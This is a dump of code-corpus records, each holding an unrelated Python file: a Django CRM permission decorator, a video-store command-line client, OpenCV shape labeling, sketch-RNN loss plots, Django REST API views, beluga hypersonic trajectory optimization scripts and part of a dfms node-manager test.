只要匹配到一个动作,就不再向下匹配动作\r\n\t\t\t\t\t\telse: # 匹配动作参数\r\n\t\t\t\t\t\t\trequest_method_func = getattr(request, request_method) # request.GET或request.POST\r\n\t\t\t\t\t\t\tif all(map(request_method_func.get, request_args)): # 如果请求中有动作规定的值\r\n\t\t\t\t\t\t\t\tmatch_flag = True # 匹配上了\r\n\t\t\t\t\t\t\telse:\r\n\t\t\t\t\t\t\t\tmatch_flag = False\r\n\t\t\t\t\t\t\t\tbreak\r\n\telse: # 没提取到url信息\r\n\t\tprint(request.path_info)\r\n\t\treturn True\r\n\tif match_flag:\r\n\t\tperm_str = \"{}.{}\".format(__package__, match_perm_key)\r\n\t\tif request.user.has_perm(perm_str): # 用django自带的权限检测检测请求的用户是否有权限\r\n\t\t\tprint(\"通过权限验证...\")\r\n\t\t\treturn True\r\n\t\telse:\r\n\t\t\tprint(\"未通过权限验证...\")\r\n\t\t\tprint(request.user, perm_str)\r\n\t\t\treturn False\r\n\r\n\r\ndef check_permission(func, redict_url=\"/crm/\"):\r\n\tdef wrapper(*args, **kwargs):\r\n\t\tprint(\"开始进行权限认证!\")\r\n\t\tif permission_check(*args, **kwargs) is not True:\r\n\t\t\treturn render(args[0], \"crm/403.html\")\r\n\t\treturn func(*args, **kwargs)\r\n\treturn wrapper\r\n","sub_path":"day19/homework/zz/crm/permissions.py","file_name":"permissions.py","file_ext":"py","file_size_in_byte":3771,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"180902514","text":"import requests\nfrom video_store import Video_store\n\n#URL = \"http://localhost:5000\"\nURL = \"https://retro-video-store-api.herokuapp.com\"\n\ndef main():\n print(u\"\\u001b[34;1mWELCOME TO BRICKBUSTER\\u001b[0m\")\n #pass\n\n\nif __name__ == \"__main__\":\n main()\n\ndef print_stars():\n \n print(\"______________________________________________________________________\")\n print(u\"\\u001b[41m___|___|___|___|___|___|___|___|___|___|___|___|___|___|___|___|___|__\")\n print(\"_|___|___|___|___|___|___|___|___|___|___|___|___|___|___|___|___|___|\")\n print(\"___|___|___|___|___|___|___|___|___|___|___|___|___|___|___|___|___|__\")\n print(\"_|___|___|___|___|___|___|___|___|___|___|___|___|___|___|___|___|___|\\u001b[0m\")\n \n \ndef houston_we():\n print(\" _______ \")\n print(\" _________ .----'''' ''''----. \")\n print(\" :______.-': : .-----------------. : \")\n print(\" | ______ | | : : | \")\n print(\" |:______B:| | | Little Error: | | \")\n print(\" |:______B:| | | | | \")\n print(\" |:______B:| | | Item not | | \")\n print(\" | | | | found. | | \")\n print(\" |:_____: | | | | | \")\n print(\" | == | | : : | \")\n print(\" | O | : '-----------------' : \")\n print(\" | o | :'-----...______...-----' \")\n print(\" | o |-._.-i_____/' \\._ \")\n print(\" |'-.____o_| '-. '-...______...-' `-._ \")\n print(\" :_________: `.____________________ `-.___.-. \")\n print(\" .'.eeeeeeeeeeeeeeeeee.'. :___: \")\n print(\" fsc .'.eeeeeeeeeeeeeeeeeeeeee.'. \")\n print(\" :____________________________: \")\n\n\ndef list_options():\n options = {\n \"1\": \"List all videos in stock\", \n \"2\": \"Create a new video record\",\n \"3\": \"Select a video\", \n \"4\": \"Update selected video\", \n \"5\": \"Delete selected video\", \n \"6\": \"Delete all videos in stock\",\n \"7\": \"List all options\",\n \"8\": \"Quit\",\n \"9\": \"Rent out a video\",\n \"10\": \"Return a video\",\n \"11\": \"List all customers\", \n \"12\": \"Add a new customer\",\n \"13\": \"Update selected customer\", \n \"14\": \"Delete selected customer\",\n \"15\": \"Select a customer\"\n }\n\n print_stars()\n print(u\"\\u001b[34m Good to see You\")\n print(\" These are the actions you can perform\\u001b[0m\")\n print_stars()\n #houston_we()\n \n for choice_num in options:\n print(f\"\\u001b[34mOption {choice_num}. {options[choice_num]}\\u001b[0m\")\n\n print_stars()\n\n return options\n\ndef make_choice(options, video_store):\n valid_choices = options.keys()\n choice = None\n\n while choice not in valid_choices:\n print(\"What would you like to do? Select 7 to see all options again\")\n choice = input(\"Make your selection using the option number: \")\n\n if choice in ['4','5'] and video_store.selected_video == None:\n print(\"You must select a video before updating or deleting it\")\n print(\"Let's select a video!\")\n choice = \"3\"\n\n elif choice in ['13', '14'] and video_store.selected_customer == None:\n print(\"You must select a customer before updating or deleting it\")\n print(\"Let's select a customer!\")\n choice = \"15\"\n\n return choice\n\ndef run_cli(play=True):\n\n video_store = Video_store(URL)\n \n options = list_options()\n\n while play==True:\n\n \n choice = make_choice(options, video_store)\n\n if choice=='1':\n print_stars()\n for video in video_store.list_videos():\n print(video)\n\n elif choice=='2':\n print(\"Great! Let's create a new video.\")\n title=input(\"What is the name of the video? \")\n release_date=input(\"When was this movie released?\")\n total_inventory=input(\"How many copies of this video are we adding?\")\n response = video_store.create_video(title=title, release_date=release_date, total_inventory= total_inventory)\n\n print_stars()\n print(\"New video:\", response)\n\n elif choice=='3':\n select_by = input(\"Would you like to select by? Enter title or id: \")\n if select_by==\"title\":\n title = input(\"Which title would you like to select? \")\n video_store.get_video(title=title)\n elif select_by==\"id\":\n video_id = input(\"Which video id would you like to select? \")\n if video_id.isnumeric():\n video_id = int(video_id)\n video_store.get_video(video_id=video_id)\n else:\n print(\"Could not select. Please enter id or title.\")\n \n if video_store.selected_video:\n print_stars()\n print(\"Selected video: \", video_store.selected_video)\n \n elif choice=='4':\n print(f\"Great! Let's update the movie: {video_store.selected_video}\")\n title=input(\"What is the title of your new video? \")\n release_date=input(\"When was it released?\")\n total_inventory=input(\"How many copies do you have available to add to stock?\")\n response = video_store.update_video(title=title, release_date=release_date, total_inventory=total_inventory)\n\n print_stars()\n print(\"video:\", response)\n\n elif choice=='5':\n video_store.delete_video()\n\n print_stars()\n print(\"Movie has been deleted.\")\n\n print_stars()\n\n elif choice=='6':\n for video in video_store.list_videos():\n video_store.get_video(video_id=video['id'])\n video_store.delete_video()\n\n print_stars()\n print(\"Deleted all videos in stock. Out with the old.\")\n\n elif choice=='7':\n list_options()\n\n elif choice=='8':\n play=False\n print(\"\\nThanks!\")\n\n elif choice =='9':\n customer_id = input(\"Which customer is renting today? (please provide customer id)\")\n video_id = input(\"Which video would they like to rent? (please provide video id)\" )\n response = video_store.check_out_video(int(customer_id), int(video_id))\n if response != 200:\n houston_we()\n print(response) \n print_stars()\n\n elif choice =='10':\n customer_id = input(\"Which customer is returning today? (please provide customer id)\")\n video_id = input(\"Which video are they returning? (please provide video id)\")\n response = video_store.check_in_video(int(customer_id), int(video_id))\n print(response) \n print_stars()\n\n \n elif choice =='11':\n print_stars()\n for customer in video_store.list_customers():\n print(customer)\n \n elif choice =='12':\n print(\"Great! Let's add a new customer.\")\n name=input(\"What is the name of customer?\")\n phone=input(\"Please add customer's phone number ->\")\n postal_code=input(\"Please add customer's postal code ->\")\n response = video_store.create_customer(name=name, phone=phone, postal_code= postal_code)\n\n print_stars()\n print(\"New customer:\", response)\n \n elif choice =='13':\n print(f\"Great! Let's update the customer {video_store.selected_customer}'s record\")\n name=input(\"What is the new name of customer?\")\n phone=input(\"Please add customer's new phone number ->\")\n postal_code=input(\"Please add customer's new postal code ->\")\n response = video_store.update_customer(name=name, phone=phone, postal_code= postal_code)\n\n print_stars()\n print(\"Customer:\", response)\n \n elif choice == '14':\n video_store.delete_customer()\n\n print_stars()\n print(\"Customer has been deleted.\")\n\n print_stars()\n\n elif choice == '15':\n select_by = input(\"Would you like to select your cutomer by? Enter name or id: \")\n if select_by==\"name\":\n title = input(\"Which customer would you like to select by name? \")\n video_store.get_customer(customer=customer)\n elif select_by==\"id\":\n customer_id = input(\"Which customer id would you like to select? \")\n if customer_id.isnumeric():\n customer_id = int(customer_id)\n video_store.get_customer(customer_id=customer_id)\n else:\n print(\"Could not select. Please enter id or name.\")\n \n if video_store.selected_customer:\n print_stars()\n print(\"Selected customer: \", video_store.selected_customer)\n\n print_stars()\n\n\nrun_cli()\n\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":9550,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"600176480","text":"\nfrom shapelabeler import ShapeDetector\nfrom colorlabeler import ColorLabeler\n\nimport cv2\nimport imutils\nimport numpy as np\nimport matplotlib.pyplot as plt\t\n\nimg = cv2.imread('../cropping/test6.jpg')\nnum_rows, num_cols = img.shape[:2]\nhorizontal_img = cv2.flip( img, 0 )\n\n\n# If we need to rotate the image\n# rotation_matrix = cv2.getRotationMatrix2D((num_cols/2, num_rows/2), 180, 1)\n# img = cv2.warpAffine(img, rotation_matrix, (num_cols, num_rows))\n\n# cropped = img[40:1040, 140:1780]\n# cv2.imshow(\"cropped\", cropped)\n\nresized = imutils.resize(img, width=1200)\nratio = resized.shape[0] / float(img.shape[0])\n\n#Convert white background to black\ngray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n(thresh, baw) = cv2.threshold(gray, 128, 255, cv2.THRESH_BINARY | cv2.THRESH_OTSU)\nwab = cv2.bitwise_not(baw)\nwabrgb = cv2.cvtColor(wab,cv2.COLOR_GRAY2RGB)\nnoBackground = cv2.bitwise_and(img, wabrgb)\n\nlab = cv2.cvtColor(noBackground, cv2.COLOR_BGR2LAB)\nblurred_3 = cv2.GaussianBlur(noBackground, (1, 1), 0)\ngray_3 = cv2.cvtColor(blurred_3, cv2.COLOR_BGR2GRAY)\nthresh_3 = cv2.threshold(gray_3, 30, 255, cv2.THRESH_BINARY)[1]\n\ncnts = cv2.findContours(thresh_3.copy(), cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)\ncnts = cnts[0] if imutils.is_cv2() else cnts[1]\n\n#Initialize classes\nsd = ShapeDetector()\ncl = ColorLabeler()\ncontours = []\n\nfor c in cnts:\n\tshape = sd.detect(c, 3)\n\tif shape != \"\":\n\t\tcolor = cl.label(lab, c)\n\t\tx,y,w,h = cv2.boundingRect(c)\n\t\tcX = x+w/2\n\t\tcY = y+h/2\n\t\tcontours.append([cX, cY, shape, color])\n\t\t\nrow = []\ncenters = []\nrowMin = contours[0][1]-10\nrowMax = contours[0][1]+10\n\nfor c in contours:\n\tcX, cY, shape, color = c\n\tif rowMin <= cY and cY <= rowMax:\n\t\trow.append([cX, cY, shape+' '+color+', '])\n\telse:\n\t\trow.sort(reverse=False)\n\t\tcenters.append(row)\n\t\trow = [[cX, cY, shape+' '+color+', ']]\n\t\trowMin = cY-10\n\t\trowMax = cY+10\n\n# Here need to format the array for the decoder file\n","sub_path":"final_cv.py","file_name":"final_cv.py","file_ext":"py","file_size_in_byte":1899,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"539834441","text":"import matplotlib.pyplot as plt\r\nimport numpy as np\r\nfrom data_load import get_data\r\nfrom model import skrnn_loss\r\nfrom eval_skrnn import load_pretrained_congen, load_pretrained_uncond\r\nimport torch\r\n\r\ndata_types = ['cat', 'cake']\r\nweights = [0.25, 0.5, 1.0]\r\ndevice = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\r\nbatch_size=50\r\n\r\nlosses = np.zeros((len(data_types), len(weights),4))\r\n\r\nfor i, data_type in enumerate(data_types):\r\n data_enc, data_dec, max_seq_len = get_data(data_type = data_type, max_len=200, train_mode='test')\r\n num_mini_batch = len(data_dec) - (len(data_dec) % batch_size)\r\n\r\n for j, weight_kl in enumerate(weights):\r\n\r\n sum_ltot, sum_lr, sum_lkl = 0.0, 0.0, 0.0 \r\n encoder, decoder, hid_dim, latent_dim, cond_gen, mode, device = load_pretrained_congen(data_type, weight_kl) \r\n \r\n for batch_id in range(0, num_mini_batch, batch_size):\r\n hidden_enc = hidden_dec = encoder.initHidden()\r\n \r\n inp_enc = torch.tensor(data_enc[batch_id:batch_id+batch_size], dtype=torch.float, device=device)\r\n inp_dec = torch.tensor(data_dec[batch_id:batch_id+batch_size], dtype=torch.float, device=device)\r\n \r\n z, hidden_dec, mu, sigma = encoder(inp_enc, hidden_enc) \r\n gmm_params, _ = decoder(inp_dec, z, hidden_dec)\r\n \r\n loss_lr, loss_kl = skrnn_loss(gmm_params, [mu,sigma], inp_dec[:,1:,], device=device)\r\n sum_ltot += (loss_lr + weight_kl*loss_kl).cpu().detach().numpy()\r\n sum_lr += loss_lr.cpu().detach().numpy()\r\n sum_lkl += loss_kl.cpu().detach().numpy()\r\n \r\n losses[i,j,0] = sum_ltot/num_mini_batch\r\n losses[i,j,1] = sum_lr/num_mini_batch\r\n losses[i,j,2] = sum_lkl/num_mini_batch\r\n\r\n\r\nfor i, data_type in enumerate(data_types):\r\n data_enc, data_dec, max_seq_len = get_data(data_type = data_type, max_len=200, train_mode='test')\r\n num_mini_batch = len(data_dec) - (len(data_dec) % batch_size)\r\n weight_kl = 0.0\r\n \r\n sum_ltot, sum_lr, sum_lkl = 0.0, 0.0, 0.0 \r\n encoder, decoder, hidden_size, latent_dim, cond_gen, mode, device = load_pretrained_uncond(data_type) \r\n\r\n for batch_id in range(0, num_mini_batch, batch_size):\r\n hidden_dec = (torch.zeros(1, 50, hidden_size, device=device), torch.zeros(1, 50, hidden_size, device=device))\r\n\r\n z = torch.zeros(50, latent_dim, device=device)\r\n\r\n gmm_params, _ = decoder(inp_dec, z, hidden_dec)\r\n \r\n loss_lr, loss_kl = skrnn_loss(gmm_params, [mu,sigma], inp_dec[:,1:,], device=device)\r\n sum_ltot += (loss_lr + weight_kl*loss_kl).cpu().detach().numpy()\r\n sum_lr += loss_lr.cpu().detach().numpy()\r\n sum_lkl += loss_kl.cpu().detach().numpy()\r\n\r\n losses[i,:,3] = sum_ltot/num_mini_batch\r\n\r\n\r\nfig, ax = plt.subplots(2,2, figsize = (15,15))\r\n\r\nax[0,0].plot(weights, losses[0,:,0], color = 'orange', marker = '+')\r\nax[0,0].axhline(losses[0,0,3], color = 'orange', linestyle = '--')\r\nax[0,0].plot(weights, losses[1,:,0], color = 'blue', marker = '+')\r\nax[0,0].axhline(losses[1,0,3], color = 'blue', linestyle = '--')\r\nax[0,0].legend([\"Cat cond\", \"Cat uncond\", \"Cake cond\", \"Cake uncond\"])\r\nax[0,0].set_xlabel('Weight KL')\r\nax[0,0].set_ylabel('LR + LKL')\r\n\r\n\r\nax[0,1].plot(weights, losses[0,:,1], color = \"orange\", marker = '+')\r\nax[0,1].axhline(losses[0,0,3], color = 'orange', linestyle = '--')\r\nax[0,1].plot(weights, losses[1,:,1], color = \"blue\", marker = '+')\r\nax[0,1].axhline(losses[1,0,3], color = 'blue', linestyle = '--')\r\nax[0,1].legend([\"Cat cond\", \"Cat uncond\", \"Cake cond\", \"Cake uncond\"])\r\nax[0,1].set_xlabel('Weight KL')\r\nax[0,1].set_ylabel('LR')\r\n\r\nax[1,0].plot(weights, losses[0,:,2], color = 'orange', marker = '+')\r\nax[1,0].plot(weights, losses[1,:,2], color = 'blue', marker = '+')\r\nax[1,0].legend([\"Cat cond\", \"Cake cond\"])\r\nax[1,0].set_xlabel('Weight KL')\r\nax[1,0].set_ylabel('LKL')\r\n\r\nax[1,1].plot(weights, losses[0,:,1], color = 'orange', marker = '+')\r\nax[1,1].axhline(losses[0,0,3], color = 'orange', linestyle = '--')\r\nax[1,1].plot(weights, losses[1,:,2], color = 'blue', marker = '+')\r\nax[1,1].axhline(losses[1,0,3], color = 'blue', linestyle = '--')\r\nax[1,1].legend([\"Cat cond\", \"Cat uncond\", \"Cake cond\", \"Cake uncond\"])\r\nax[1,1].set_xlabel('LKL')\r\nax[1,1].set_ylabel('LR')\r\n\r\nplt.savefig(\"plot_loss.png\")\r\nplt.show()\r\n","sub_path":"sketch_generation/plot_loss.py","file_name":"plot_loss.py","file_ext":"py","file_size_in_byte":4406,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"589391123","text":"from .models import Movie, Person, Role\nfrom .serializer import MovieSerializer, PersonSerializer\nfrom django.http import Http404\nfrom django.views.decorators.csrf import csrf_exempt\nfrom django.shortcuts import render, redirect\nfrom django.utils.decorators import method_decorator\nfrom django.views import View\nfrom rest_framework import status\nfrom rest_framework.views import APIView\nfrom rest_framework.response import Response\n# Create your views here.\nclass MenuView(View):\n\n def get(self, request):\n return render(request, 'movies/menu.html')\n\nclass MoviesListView(APIView):\n\n def get(self, request, format=None):\n movies_list = Movie.objects.all()\n serializer = MovieSerializer(movies_list, many=True, context={'request': request})\n return Response(serializer.data)\n\n def post(self, request, format=None):\n serializer = MovieSerializer(data=request.data)\n if serializer.is_valid():\n serializer.save()\n return Response(serializer.data, status=status.HTTP_201_CREATED)\n return Response(serializer.data, status=status.HTTP_400_BAD_REQUEST)\n\nclass MovieView(APIView):\n\n def get_object(self, pk):\n try:\n return Movie.objects.get(pk=pk)\n except Movie.DoesNotExist:\n raise Http404\n\n def get(self, request, id, format=None):\n movie = self.get_object(id)\n serializer = MovieSerializer(movie, context={\"request\": request})\n return Response(serializer.data)\n\n def delete(self, request, id, format=None):\n movie = self.get_object(id)\n movie.delete()\n return Response(status=status.HTTP_204_NO_CONTENT)\n\n def put(self, request, id, format=None):\n movie = self.get_object(id)\n serializer = MovieSerializer(movie, data=request.data)\n if serializer.is_valid():\n serializer.save()\n return Response(serializer.data)\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\n def post():\n pass\n\nclass PersonsListView(APIView):\n\n def get(self, request):\n persons_list = Person.objects.all()\n serializer = PersonSerializer(persons_list, many=True, context={'request': request})\n return Response(serializer.data)\n\n def post():\n serializer = PersonSerializer(data=request.data)\n if serializer.is_valid():\n serializer.save()\n return Response(serializer.data, status=status.HTTP_201_CREATED)\n return Response(serializer.data, status=status.HTTP_400_BAD_REQUEST)\n\nclass PersonView(APIView):\n\n def get_object(self, pk):\n try:\n return Person.objects.get(pk=pk)\n except Person.DoesNotExist:\n raise Http404\n\n def get(self, request, pk, format=None):\n person = self.get_object(pk)\n serializer = PersonSerializer(person, context={'request': request})\n return Response(serializer.data)\n\n def delete(self, request, pk, format=None):\n person = self.get_object(pk)\n person.delete()\n return Response(status=status.HTTP_204_NO_CONTENT)\n\n def put(self, request, pk, format=None):\n person = self.get_object(pk)\n serializer = PersonSerializer(person, data=request.data)\n if serializer.is_valid():\n serializer.save()\n return Response(serializer.data)\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n","sub_path":"rest_server/movies/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3444,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"638056685","text":"\"\"\"Unconstrained planar hypersonic trajectory problem.\nEntry flight-path angle is constrained so the vehicle enters\nthe atmosphere fairly steep. It performs a skip maneuver to\nreach it's target. The first solution is the planar problem,\nwhich then is used as an initial guess into the 4-hypersonic3dof problem.\"\"\"\nfrom math import *\n\nimport beluga\nimport logging\n\n'''\nBegin the planar portion of the solution process.\n'''\nocp = beluga.OCP('planarHypersonic')\n\n# Define independent variables\nocp.independent('t', 's')\n\n\n# Define equations of motion\nocp.state('h','v*sin(gam)','m') \\\n .state('theta','v*cos(gam)/r','rad') \\\n .state('v','-D/mass - mu*sin(gam)/r**2','m/s') \\\n .state('gam','L/(mass*v) + (v/r - mu/(v*r^2))*cos(gam)','rad')\n\n\n# Define quantities used in the problem\nocp.quantity('rho','rho0*exp(-h/H)')\nocp.quantity('Cl','(1.5658*alfa + -0.0000)')\nocp.quantity('Cd','(1.6537*alfa^2 + 0.0612)')\nocp.quantity('D','0.5*rho*v^2*Cd*Aref')\nocp.quantity('L','0.5*rho*v^2*Cl*Aref')\nocp.quantity('r','re+h')\n\n\n\n# Define controls\nocp.control('alfa','rad')\n\n# Define constants\nocp.constant('mu', 3.986e5*1e9, 'm^3/s^2') # Gravitational parameter, m^3/s^2\nocp.constant('rho0', 0.0001*1.2, 'kg/m^3') # Sea-level atmospheric density, kg/m^3\nocp.constant('H', 7500, 'm') # Scale height for atmosphere of Earth, m\nocp.constant('mass',750/2.2046226,'kg') # Mass of vehicle, kg\nocp.constant('re',6378000,'m') # Radius of planet, m\nocp.constant('Aref',pi*(24*.0254/2)**2,'m^2') # Reference area of vehicle, m^2\nocp.constant('h_0', 80000, 'm')\nocp.constant('v_0', 4000, 'm/s')\nocp.constant('gam_0', (-90)*pi/180, 'rad')\nocp.constant('h_f', 80000, 'm')\nocp.constant('theta_f', 0, 'rad')\n\n# Define costs\nocp.terminal_cost('-v^2','m^2/s^2')\n\n# Define constraints\nocp.constraints() \\\n .initial('h-h_0','m') \\\n .initial('theta','rad') \\\n .initial('v-v_0','m/s') \\\n .initial('gam-gam_0','rad') \\\n .terminal('h-h_f','m') \\\n .terminal('theta-theta_f','rad')\n\nocp.scale(m='h', s='h/v', kg='mass', rad=1)\n\nbvp_solver = beluga.bvp_algorithm('Shooting',\n derivative_method='fd',\n tolerance=1e-6,\n max_iterations=100,\n max_error=100,\n algorithm='SLSQP'\n)\n\nguess_maker = beluga.guess_generator('auto',\n start=[40000,0,2000,(-90)*pi/180],\n direction='forward',\n costate_guess = -0.1\n)\n\ncontinuation_steps = beluga.init_continuation()\n\n# Start by flying straight towards the ground\ncontinuation_steps.add_step('bisection') \\\n .num_cases(5) \\\n .const('h_f',0)\n\n# Slowly turn up the density\ncontinuation_steps.add_step('bisection') \\\n .num_cases(3) \\\n .const('rho0',1.2)\n\n# Move downrange out a tad\ncontinuation_steps.add_step('bisection') \\\n .num_cases(3) \\\n .const('theta_f',0.01*pi/180)\n\n# Bring flight-path angle up slightly to activate the control\ncontinuation_steps.add_step('bisection') \\\n .num_cases(11) \\\n .const('gam_0', -80*pi/180) \\\n .const('theta_f', 0.5*pi/180)\n\ncontinuation_steps.add_step('bisection') \\\n .num_cases(31) \\\n .const('gam_0', -0*pi/180) \\\n .const('theta_f', 3*pi/180)\n\nbeluga.add_logger(logging_level=logging.DEBUG)\n\nsol = beluga.solve(ocp,\n method='traditional',\n bvp_algorithm=bvp_solver,\n steps=continuation_steps,\n guess_generator=guess_maker)\n\n\n'''\nBegin the 3 dof portion of the solution process.\n'''\nocp_2 = beluga.OCP('hypersonic3DOF')\n\n# Define independent variables\nocp_2.independent('t', 's')\n\nrho = 'rho0*exp(-h/H)'\nCl = '(1.5658*alpha + -0.0000)'\nCd = '(1.6537*alpha**2 + 0.0612)'\nD = '(0.5*{}*v**2*{}*Aref)'.format(rho, Cd)\nL = '(0.5*{}*v**2*{}*Aref)'.format(rho, Cl)\nr = '(re+h)'\n\n# Define equations of motion\nocp_2 \\\n .state('h', 'v*sin(gam)', 'm') \\\n .state('theta', 'v*cos(gam)*cos(psi)/({}*cos(phi))'.format(r), 'rad') \\\n .state('phi', 'v*cos(gam)*sin(psi)/{}'.format(r), 'rad') \\\n .state('v', '-{}/mass - mu*sin(gam)/{}**2'.format(D,r), 'm/s') \\\n .state('gam', '{}*cos(bank)/(mass*v) - mu/(v*{}**2)*cos(gam) + v/{}*cos(gam)'.format(L,r,r), 'rad') \\\n .state('psi', '{}*sin(bank)/(mass*cos(gam)*v) - v/{}*cos(gam)*cos(psi)*tan(phi)'.format(L,r), 'rad')\n\n# Define controls\nocp_2.control('alpha', 'rad') \\\n .control('bank', 'rad')\n\n# Define costs\nocp_2.terminal_cost('-v^2', 'm^2/s^2')\n\n# Define constraints\nocp_2.constraints() \\\n .initial('h-h_0', 'm') \\\n .initial('theta-theta_0', 'rad') \\\n .initial('phi-phi_0', 'rad') \\\n .initial('v-v_0', 'm/s') \\\n .initial('gam-gam_0', 'rad') \\\n .initial('psi-psi_0', 'rad') \\\n .terminal('h-h_f', 'm') \\\n .terminal('theta-theta_f', 'rad') \\\n .terminal('phi-phi_f', 'rad')\n\n# Define constants\nocp_2.constant('mu', 3.986e5*1e9, 'm**3/s**2') # Gravitational parameter, m**3/s**2\nocp_2.constant('rho0', 1.2, 'kg/m**3') # Sea-level atmospheric density, kg/m**3\nocp_2.constant('H', 7500, 'm') # Scale height for atmosphere of Earth, m\nocp_2.constant('mass', 750/2.2046226, 'kg') # Mass of vehicle, kg\nocp_2.constant('re', 6378000, 'm') # Radius of planet, m\nocp_2.constant('Aref', pi*(24*.0254/2)**2, 'm**2') # Reference area of vehicle, m**2\nocp_2.constant('rn', 1/12*0.3048, 'm') # Nose radius, m\nocp_2.constant('h_0', sol.y[0,0], 'm')\nocp_2.constant('theta_0', sol.y[0,1], 'rad')\nocp_2.constant('phi_0', 0, 'rad')\nocp_2.constant('v_0', sol.y[0,2], 'm/s')\nocp_2.constant('gam_0', sol.y[0,3], 'rad')\nocp_2.constant('psi_0', 0, 'rad')\nocp_2.constant('h_f', sol.y[-1,0], 'm')\nocp_2.constant('theta_f', sol.y[-1,1], 'rad')\nocp_2.constant('phi_f', 0, 'rad')\n\nocp_2.scale(m='h', s='h/v', kg='mass', rad=1)\n\nbvp_solver_2 = beluga.bvp_algorithm('Shooting',\n derivative_method='fd',\n tolerance=1e-4,\n max_iterations=100,\n max_error=400,\n algorithm='SLSQP'\n )\n\nguess_maker_2 = beluga.guess_generator('auto',\n start=[sol.y[0,0], sol.y[0,1], 0, sol.y[0,2], sol.y[0,3], 0],\n direction='forward',\n costate_guess=[sol.y[0,4], sol.y[0,5], -0.01, sol.y[0,6], sol.y[0,7], -0.01],\n control_guess=[sol.u[0,0], 0.0],\n use_control_guess=True,\n time_integrate=sol.t[-1],\n )\n\ncontinuation_steps_2 = beluga.init_continuation()\n\ncontinuation_steps_2.add_step('bisection').num_cases(3) \\\n .const('h_f', sol.y[-1,0]) \\\n .const('theta_f', sol.y[-1,1]) \\\n .const('phi_f', 0)\n\ncontinuation_steps_2.add_step('bisection').num_cases(41) \\\n .const('phi_f', 2*pi/180)\n\nsol = beluga.solve(ocp_2,\n method='traditional',\n bvp_algorithm=bvp_solver_2,\n steps=continuation_steps_2,\n guess_generator=guess_maker_2)\n","sub_path":"examples/4-hypersonic3dof/planarto3dof.py","file_name":"planarto3dof.py","file_ext":"py","file_size_in_byte":7268,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"48951343","text":"#\n# ICRAR - International Centre for Radio Astronomy Research\n# (c) UWA - The University of Western Australia, 2015\n# Copyright by UWA (in the framework of the ICRAR)\n# All rights reserved\n#\n# This library is free software; you can redistribute it and/or\n# modify it under the terms of the GNU Lesser General Public\n# License as published by the Free Software Foundation; either\n# version 2.1 of the License, or (at your option) any later version.\n#\n# This library is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU\n# Lesser General Public License for more details.\n#\n# You should have received a copy of the GNU Lesser General Public\n# License along with this library; if not, write to the Free Software\n# Foundation, Inc., 59 Temple Place, Suite 330, Boston,\n# MA 02111-1307 USA\n#\nimport json\nimport random\nimport string\nimport subprocess\nimport sys\nimport threading\nimport time\nimport unittest\n\nimport Pyro4\nimport pkg_resources\n\nfrom dfms import droputils\nfrom dfms import ngaslite, utils\nfrom dfms.ddap_protocol import DROPStates\nfrom dfms.drop import BarrierAppDROP\nfrom dfms.manager.node_manager import NodeManager\nfrom dfms.manager.repository import memory, sleepAndCopy\nfrom dfms.manager.session import SessionStates\nfrom test.manager import testutils\n\n\nhostname = 'localhost'\n\nclass ErroneousApp(BarrierAppDROP):\n def run(self):\n raise Exception(\"Sorry, we always fail\")\n\nclass TestDM(unittest.TestCase):\n\n def test_error_listener(self):\n\n evt = threading.Event()\n erroneous_drops = []\n class listener(object):\n def on_error(self, drop):\n erroneous_drops.append(drop.uid)\n if len(erroneous_drops) == 2: # both 'C' and 'B' failed already\n evt.set()\n\n sessionId = 'lala'\n dm = NodeManager(useDLM=False, error_listener=listener())\n g = [{\"oid\":\"A\", \"type\":\"plain\", \"storage\": \"memory\"},\n {\"oid\":\"B\", \"type\":\"app\", \"app\":\"test.manager.test_dm.ErroneousApp\", \"inputs\": [\"A\"]},\n {\"oid\":\"C\", \"type\":\"plain\", \"storage\": \"memory\", \"producers\":[\"B\"]}]\n dm.createSession(sessionId)\n dm.addGraphSpec(sessionId, g)\n dm.deploySession(sessionId, [\"A\"])\n\n self.assertTrue(evt.wait(10), \"Didn't receive errors on time\")\n\n def test_runGraphOneDOPerDOM(self):\n \"\"\"\n A test that creates three DROPs in two different DMs, wire two of\n them together externally (i.e., using their proxies), and runs the graph.\n For this the graphs that are fed into the DMs must *not* express the\n inter-DM relationships. The graph looks like:\n\n DM #1 DM #2\n ======= =============\n | A --|----|-> B --> C |\n ======= =============\n \"\"\"\n dm1 = NodeManager(useDLM=False)\n dm2 = NodeManager(useDLM=False)\n\n sessionId = 's1'\n g1 = [{\"oid\":\"A\", \"type\":\"plain\", \"storage\": \"memory\"}]\n g2 = [{\"oid\":\"B\", \"type\":\"app\", \"app\":\"dfms.apps.crc.CRCApp\"},\n {\"oid\":\"C\", \"type\":\"plain\", \"storage\": \"memory\", \"producers\":[\"B\"]}]\n\n uris1 = dm1.quickDeploy(sessionId, g1)\n uris2 = dm2.quickDeploy(sessionId, g2)\n self.assertEquals(1, len(uris1))\n self.assertEquals(2, len(uris2))\n\n # We externally wire the Proxy objects now\n a = Pyro4.Proxy(uris1['A'])\n b = Pyro4.Proxy(uris2['B'])\n c = Pyro4.Proxy(uris2['C'])\n a.addConsumer(b)\n\n # Run! We wait until c is completed\n with droputils.EvtConsumerProxyCtx(self, c, 1):\n a.write('a')\n a.setCompleted()\n\n for drop in a, b, c:\n self.assertEquals(DROPStates.COMPLETED, drop.status)\n self.assertEquals(a.checksum, int(droputils.allDropContents(c)))\n\n for dropProxy in a,b,c:\n dropProxy._pyroRelease()\n\n 